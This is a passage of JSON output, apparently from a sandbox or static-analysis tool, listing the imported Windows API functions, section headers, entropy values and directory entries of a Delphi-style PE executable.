4416. "name": "GetScrollPos",
4417. "address": "0x46f610"
4418. },
4419. {
4420. "name": "GetScrollInfo",
4421. "address": "0x46f614"
4422. },
4423. {
4424. "name": "GetPropA",
4425. "address": "0x46f618"
4426. },
4427. {
4428. "name": "GetParent",
4429. "address": "0x46f61c"
4430. },
4431. {
4432. "name": "GetWindow",
4433. "address": "0x46f620"
4434. },
4435. {
4436. "name": "GetMessageTime",
4437. "address": "0x46f624"
4438. },
4439. {
4440. "name": "GetMenuStringA",
4441. "address": "0x46f628"
4442. },
4443. {
4444. "name": "GetMenuState",
4445. "address": "0x46f62c"
4446. },
4447. {
4448. "name": "GetMenuItemInfoA",
4449. "address": "0x46f630"
4450. },
4451. {
4452. "name": "GetMenuItemID",
4453. "address": "0x46f634"
4454. },
4455. {
4456. "name": "GetMenuItemCount",
4457. "address": "0x46f638"
4458. },
4459. {
4460. "name": "GetMenu",
4461. "address": "0x46f63c"
4462. },
4463. {
4464. "name": "GetLastActivePopup",
4465. "address": "0x46f640"
4466. },
4467. {
4468. "name": "GetKeyboardState",
4469. "address": "0x46f644"
4470. },
4471. {
4472. "name": "GetKeyboardLayoutList",
4473. "address": "0x46f648"
4474. },
4475. {
4476. "name": "GetKeyboardLayout",
4477. "address": "0x46f64c"
4478. },
4479. {
4480. "name": "GetKeyState",
4481. "address": "0x46f650"
4482. },
4483. {
4484. "name": "GetKeyNameTextA",
4485. "address": "0x46f654"
4486. },
4487. {
4488. "name": "GetIconInfo",
4489. "address": "0x46f658"
4490. },
4491. {
4492. "name": "GetForegroundWindow",
4493. "address": "0x46f65c"
4494. },
4495. {
4496. "name": "GetFocus",
4497. "address": "0x46f660"
4498. },
4499. {
4500. "name": "GetDesktopWindow",
4501. "address": "0x46f664"
4502. },
4503. {
4504. "name": "GetDCEx",
4505. "address": "0x46f668"
4506. },
4507. {
4508. "name": "GetDC",
4509. "address": "0x46f66c"
4510. },
4511. {
4512. "name": "GetCursorPos",
4513. "address": "0x46f670"
4514. },
4515. {
4516. "name": "GetCursor",
4517. "address": "0x46f674"
4518. },
4519. {
4520. "name": "GetClipboardData",
4521. "address": "0x46f678"
4522. },
4523. {
4524. "name": "GetClientRect",
4525. "address": "0x46f67c"
4526. },
4527. {
4528. "name": "GetClassNameA",
4529. "address": "0x46f680"
4530. },
4531. {
4532. "name": "GetClassInfoA",
4533. "address": "0x46f684"
4534. },
4535. {
4536. "name": "GetCapture",
4537. "address": "0x46f688"
4538. },
4539. {
4540. "name": "GetActiveWindow",
4541. "address": "0x46f68c"
4542. },
4543. {
4544. "name": "FrameRect",
4545. "address": "0x46f690"
4546. },
4547. {
4548. "name": "FindWindowA",
4549. "address": "0x46f694"
4550. },
4551. {
4552. "name": "FillRect",
4553. "address": "0x46f698"
4554. },
4555. {
4556. "name": "EqualRect",
4557. "address": "0x46f69c"
4558. },
4559. {
4560. "name": "EnumWindows",
4561. "address": "0x46f6a0"
4562. },
4563. {
4564. "name": "EnumThreadWindows",
4565. "address": "0x46f6a4"
4566. },
4567. {
4568. "name": "EnumClipboardFormats",
4569. "address": "0x46f6a8"
4570. },
4571. {
4572. "name": "EndPaint",
4573. "address": "0x46f6ac"
4574. },
4575. {
4576. "name": "EndDeferWindowPos",
4577. "address": "0x46f6b0"
4578. },
4579. {
4580. "name": "EnableWindow",
4581. "address": "0x46f6b4"
4582. },
4583. {
4584. "name": "EnableScrollBar",
4585. "address": "0x46f6b8"
4586. },
4587. {
4588. "name": "EnableMenuItem",
4589. "address": "0x46f6bc"
4590. },
4591. {
4592. "name": "EmptyClipboard",
4593. "address": "0x46f6c0"
4594. },
4595. {
4596. "name": "DrawTextA",
4597. "address": "0x46f6c4"
4598. },
4599. {
4600. "name": "DrawMenuBar",
4601. "address": "0x46f6c8"
4602. },
4603. {
4604. "name": "DrawIconEx",
4605. "address": "0x46f6cc"
4606. },
4607. {
4608. "name": "DrawIcon",
4609. "address": "0x46f6d0"
4610. },
4611. {
4612. "name": "DrawFrameControl",
4613. "address": "0x46f6d4"
4614. },
4615. {
4616. "name": "DrawEdge",
4617. "address": "0x46f6d8"
4618. },
4619. {
4620. "name": "DispatchMessageA",
4621. "address": "0x46f6dc"
4622. },
4623. {
4624. "name": "DestroyWindow",
4625. "address": "0x46f6e0"
4626. },
4627. {
4628. "name": "DestroyMenu",
4629. "address": "0x46f6e4"
4630. },
4631. {
4632. "name": "DestroyIcon",
4633. "address": "0x46f6e8"
4634. },
4635. {
4636. "name": "DestroyCursor",
4637. "address": "0x46f6ec"
4638. },
4639. {
4640. "name": "DeleteMenu",
4641. "address": "0x46f6f0"
4642. },
4643. {
4644. "name": "DeferWindowPos",
4645. "address": "0x46f6f4"
4646. },
4647. {
4648. "name": "DefWindowProcA",
4649. "address": "0x46f6f8"
4650. },
4651. {
4652. "name": "DefMDIChildProcA",
4653. "address": "0x46f6fc"
4654. },
4655. {
4656. "name": "DefFrameProcA",
4657. "address": "0x46f700"
4658. },
4659. {
4660. "name": "CreatePopupMenu",
4661. "address": "0x46f704"
4662. },
4663. {
4664. "name": "CreateMenu",
4665. "address": "0x46f708"
4666. },
4667. {
4668. "name": "CreateIcon",
4669. "address": "0x46f70c"
4670. },
4671. {
4672. "name": "CloseClipboard",
4673. "address": "0x46f710"
4674. },
4675. {
4676. "name": "ClientToScreen",
4677. "address": "0x46f714"
4678. },
4679. {
4680. "name": "CheckMenuItem",
4681. "address": "0x46f718"
4682. },
4683. {
4684. "name": "CallWindowProcA",
4685. "address": "0x46f71c"
4686. },
4687. {
4688. "name": "CallNextHookEx",
4689. "address": "0x46f720"
4690. },
4691. {
4692. "name": "BeginPaint",
4693. "address": "0x46f724"
4694. },
4695. {
4696. "name": "BeginDeferWindowPos",
4697. "address": "0x46f728"
4698. },
4699. {
4700. "name": "CharNextA",
4701. "address": "0x46f72c"
4702. },
4703. {
4704. "name": "CharLowerBuffA",
4705. "address": "0x46f730"
4706. },
4707. {
4708. "name": "CharLowerA",
4709. "address": "0x46f734"
4710. },
4711. {
4712. "name": "CharUpperBuffA",
4713. "address": "0x46f738"
4714. },
4715. {
4716. "name": "CharToOemA",
4717. "address": "0x46f73c"
4718. },
4719. {
4720. "name": "AdjustWindowRectEx",
4721. "address": "0x46f740"
4722. },
4723. {
4724. "name": "ActivateKeyboardLayout",
4725. "address": "0x46f744"
4726. }
4727. ],
4728. "dll": "user32.dll"
4729. },
4730. {
4731. "imports": [
4732. {
4733. "name": "Sleep",
4734. "address": "0x46f74c"
4735. }
4736. ],
4737. "dll": "kernel32.dll"
4738. },
4739. {
4740. "imports": [
4741. {
4742. "name": "SafeArrayPtrOfIndex",
4743. "address": "0x46f754"
4744. },
4745. {
4746. "name": "SafeArrayGetUBound",
4747. "address": "0x46f758"
4748. },
4749. {
4750. "name": "SafeArrayGetLBound",
4751. "address": "0x46f75c"
4752. },
4753. {
4754. "name": "SafeArrayCreate",
4755. "address": "0x46f760"
4756. },
4757. {
4758. "name": "VariantChangeType",
4759. "address": "0x46f764"
4760. },
4761. {
4762. "name": "VariantCopy",
4763. "address": "0x46f768"
4764. },
4765. {
4766. "name": "VariantClear",
4767. "address": "0x46f76c"
4768. },
4769. {
4770. "name": "VariantInit",
4771. "address": "0x46f770"
4772. }
4773. ],
4774. "dll": "oleaut32.dll"
4775. },
4776. {
4777. "imports": [
4778. {
4779. "name": "CreateStreamOnHGlobal",
4780. "address": "0x46f778"
4781. },
4782. {
4783. "name": "IsAccelerator",
4784. "address": "0x46f77c"
4785. },
4786. {
4787. "name": "OleDraw",
4788. "address": "0x46f780"
4789. },
4790. {
4791. "name": "OleSetMenuDescriptor",
4792. "address": "0x46f784"
4793. },
4794. {
4795. "name": "CoTaskMemFree",
4796. "address": "0x46f788"
4797. },
4798. {
4799. "name": "ProgIDFromCLSID",
4800. "address": "0x46f78c"
4801. },
4802. {
4803. "name": "StringFromCLSID",
4804. "address": "0x46f790"
4805. },
4806. {
4807. "name": "CoCreateInstance",
4808. "address": "0x46f794"
4809. },
4810. {
4811. "name": "CoGetClassObject",
4812. "address": "0x46f798"
4813. },
4814. {
4815. "name": "CoUninitialize",
4816. "address": "0x46f79c"
4817. },
4818. {
4819. "name": "CoInitialize",
4820. "address": "0x46f7a0"
4821. },
4822. {
4823. "name": "IsEqualGUID",
4824. "address": "0x46f7a4"
4825. }
4826. ],
4827. "dll": "ole32.dll"
4828. },
4829. {
4830. "imports": [
4831. {
4832. "name": "GetErrorInfo",
4833. "address": "0x46f7ac"
4834. },
4835. {
4836. "name": "GetActiveObject",
4837. "address": "0x46f7b0"
4838. },
4839. {
4840. "name": "SysFreeString",
4841. "address": "0x46f7b4"
4842. }
4843. ],
4844. "dll": "oleaut32.dll"
4845. },
4846. {
4847. "imports": [
4848. {
4849. "name": "ImageList_SetIconSize",
4850. "address": "0x46f7bc"
4851. },
4852. {
4853. "name": "ImageList_GetIconSize",
4854. "address": "0x46f7c0"
4855. },
4856. {
4857. "name": "ImageList_Write",
4858. "address": "0x46f7c4"
4859. },
4860. {
4861. "name": "ImageList_Read",
4862. "address": "0x46f7c8"
4863. },
4864. {
4865. "name": "ImageList_GetDragImage",
4866. "address": "0x46f7cc"
4867. },
4868. {
4869. "name": "ImageList_DragShowNolock",
4870. "address": "0x46f7d0"
4871. },
4872. {
4873. "name": "ImageList_SetDragCursorImage",
4874. "address": "0x46f7d4"
4875. },
4876. {
4877. "name": "ImageList_DragMove",
4878. "address": "0x46f7d8"
4879. },
4880. {
4881. "name": "ImageList_DragLeave",
4882. "address": "0x46f7dc"
4883. },
4884. {
4885. "name": "ImageList_DragEnter",
4886. "address": "0x46f7e0"
4887. },
4888. {
4889. "name": "ImageList_EndDrag",
4890. "address": "0x46f7e4"
4891. },
4892. {
4893. "name": "ImageList_BeginDrag",
4894. "address": "0x46f7e8"
4895. },
4896. {
4897. "name": "ImageList_Remove",
4898. "address": "0x46f7ec"
4899. },
4900. {
4901. "name": "ImageList_DrawEx",
4902. "address": "0x46f7f0"
4903. },
4904. {
4905. "name": "ImageList_Draw",
4906. "address": "0x46f7f4"
4907. },
4908. {
4909. "name": "ImageList_GetBkColor",
4910. "address": "0x46f7f8"
4911. },
4912. {
4913. "name": "ImageList_SetBkColor",
4914. "address": "0x46f7fc"
4915. },
4916. {
4917. "name": "ImageList_ReplaceIcon",
4918. "address": "0x46f800"
4919. },
4920. {
4921. "name": "ImageList_Add",
4922. "address": "0x46f804"
4923. },
4924. {
4925. "name": "ImageList_GetImageCount",
4926. "address": "0x46f808"
4927. },
4928. {
4929. "name": "ImageList_Destroy",
4930. "address": "0x46f80c"
4931. },
4932. {
4933. "name": "ImageList_Create",
4934. "address": "0x46f810"
4935. }
4936. ],
4937. "dll": "comctl32.dll"
4938. },
4939. {
4940. "imports": [
4941. {
4942. "name": "OpenPrinterA",
4943. "address": "0x46f818"
4944. },
4945. {
4946. "name": "EnumPrintersA",
4947. "address": "0x46f81c"
4948. },
4949. {
4950. "name": "DocumentPropertiesA",
4951. "address": "0x46f820"
4952. },
4953. {
4954. "name": "ClosePrinter",
4955. "address": "0x46f824"
4956. }
4957. ],
4958. "dll": "winspool.drv"
4959. },
4960. {
4961. "imports": [
4962. {
4963. "name": "PrintDlgA",
4964. "address": "0x46f82c"
4965. }
4966. ],
4967. "dll": "comdlg32.dll"
4968. }
4969. ],
4970. "digital_signers": null,
4971. "exported_dll_name": null,
4972. "actual_checksum": "0x000d4802",
4973. "overlay": null,
4974. "imagebase": "0x00400000",
4975. "reported_checksum": "0x00000000",
4976. "icon_hash": null,
4977. "entrypoint": "0x0046304c",
4978. "timestamp": "1992-05-28 01:25:48",
4979. "osversion": "4.0",
4980. "sections": [
4981. {
4982. "name": "CODE",
4983. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
4984. "virtual_address": "0x00001000",
4985. "size_of_data": "0x00062200",
4986. "entropy": "6.54",
4987. "raw_address": "0x00000400",
4988. "virtual_size": "0x00062094",
4989. "characteristics_raw": "0x60000020"
4990. },
4991. {
4992. "name": "DATA",
4993. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
4994. "virtual_address": "0x00064000",
4995. "size_of_data": "0x00009600",
4996. "entropy": "4.97",
4997. "raw_address": "0x00062600",
4998. "virtual_size": "0x00009528",
4999. "characteristics_raw": "0xc0000040"
5000. },
5001. {
5002. "name": "BSS",
5003. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
5004. "virtual_address": "0x0006e000",
5005. "size_of_data": "0x00000000",
5006. "entropy": "0.00",
5007. "raw_address": "0x0006bc00",
5008. "virtual_size": "0x00000d59",
5009. "characteristics_raw": "0xc0000000"
5010. },
5011. {
5012. "name": ".idata",
5013. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
5014. "virtual_address": "0x0006f000",
5015. "size_of_data": "0x00002600",
5016. "entropy": "5.01",
5017. "raw_address": "0x0006bc00",
5018. "virtual_size": "0x00002540",
5019. "characteristics_raw": "0xc0000040"
5020. },
5021. {
5022. "name": ".tls",
5023. "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
5024. "virtual_address": "0x00072000",
5025. "size_of_data": "0x00000000",
5026. "entropy": "0.00",
5027. "raw_address": "0x0006e200",
5028. "virtual_size": "0x00000010",
5029. "characteristics_raw": "0xc0000000"
5030. },
5031. {
5032. "name": ".rdata",
5033. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
5034. "virtual_address": "0x00073000",
5035. "size_of_data": "0x00000200",
5036. "entropy": "0.21",
5037. "raw_address": "0x0006e200",
5038. "virtual_size": "0x00000018",
5039. "characteristics_raw": "0x50000040"
5040. },
5041. {
5042. "name": ".reloc",
5043. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
5044. "virtual_address": "0x00074000",
5045. "size_of_data": "0x00007200",
5046. "entropy": "6.67",
5047. "raw_address": "0x0006e400",
5048. "virtual_size": "0x00007108",
5049. "characteristics_raw": "0x50000040"
5050. },
5051. {
5052. "name": ".rsrc",
5053. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
5054. "virtual_address": "0x0007c000",
5055. "size_of_data": "0x00059200",
5056. "entropy": "7.49",
5057. "raw_address": "0x00075600",
5058. "virtual_size": "0x0005900c",
5059. "characteristics_raw": "0x50000040"
5060. }
5061. ],
5062. "resources": [],
5063. "dirents": [
5064. {
5065. "virtual_address": "0x00000000",
5066. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
5067. "size": "0x00000000"
5068. },
5069. {
5070. "virtual_address": "0x0006f000",
5071. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
5072. "size": "0x00002540"
5073. },
5074. {
5075. "virtual_address": "0x0007c000",
5076. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
5077. "size": "0x0005900c"
5078. },
5079. {
5080. "virtual_address": "0x00000000",
5081. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
5082. "size": "0x00000000"
5083. },
5084. {
5085. "virtual_address": "0x00000000",
5086. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
5087. "size": "0x00000000"
5088. },
5089. {
5090. "virtual_address": "0x00074000",
5091. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
5092. "size": "0x00007108"
5093. },
5094. {
5095. "virtual_address": "0x00000000",
5096. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
5097. "size": "0x00000000"
5098. },
5099. {
5100. "virtual_address": "0x00000000",
5101. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
5102. "size": "0x00000000"
5103. },
5104. {
5105. "virtual_address": "0x00000000",
5106. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
5107. "size": "0x00000000"
5108. },
5109. {
5110. "virtual_address": "0x00073000",
5111. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
5112. "size": "0x00000018"
5113. },
5114. {
5115. "virtual_address": "0x00000000",
5116. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
5117. "size": "0x00000000"
5118. },
5119. {
5120. "virtual_address": "0x00000000",
5121. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
5122. "size": "0x00000000"
5123. },
5124. {
5125. "virtual_address": "0x00000000",
5126. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
5127. "size": "0x00000000"
5128. },
5129. {
5130. "virtual_address": "0x00000000",
5131. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
5132. "size": "0x00000000"
5133. },
5134. {
5135. "virtual_address": "0x00000000",
5136. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
5137. "size": "0x00000000"
5138. },
5139. {
5140. "virtual_address": "0x00000000",
5141. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
5142. "size": "0x00000000"
5143. }
5144. ],
5145. "exports": [],
5146. "guest_signers": {},
5147. "imphash": "46116a2f8090728368dbf9ef96584273",
5148. "icon_fuzzy": null,
5149. "icon": null,
5150. "pdbpath": null,
5151. "imported_dll_count": 17,
5152. "versioninfo": []
5153. }
5154. }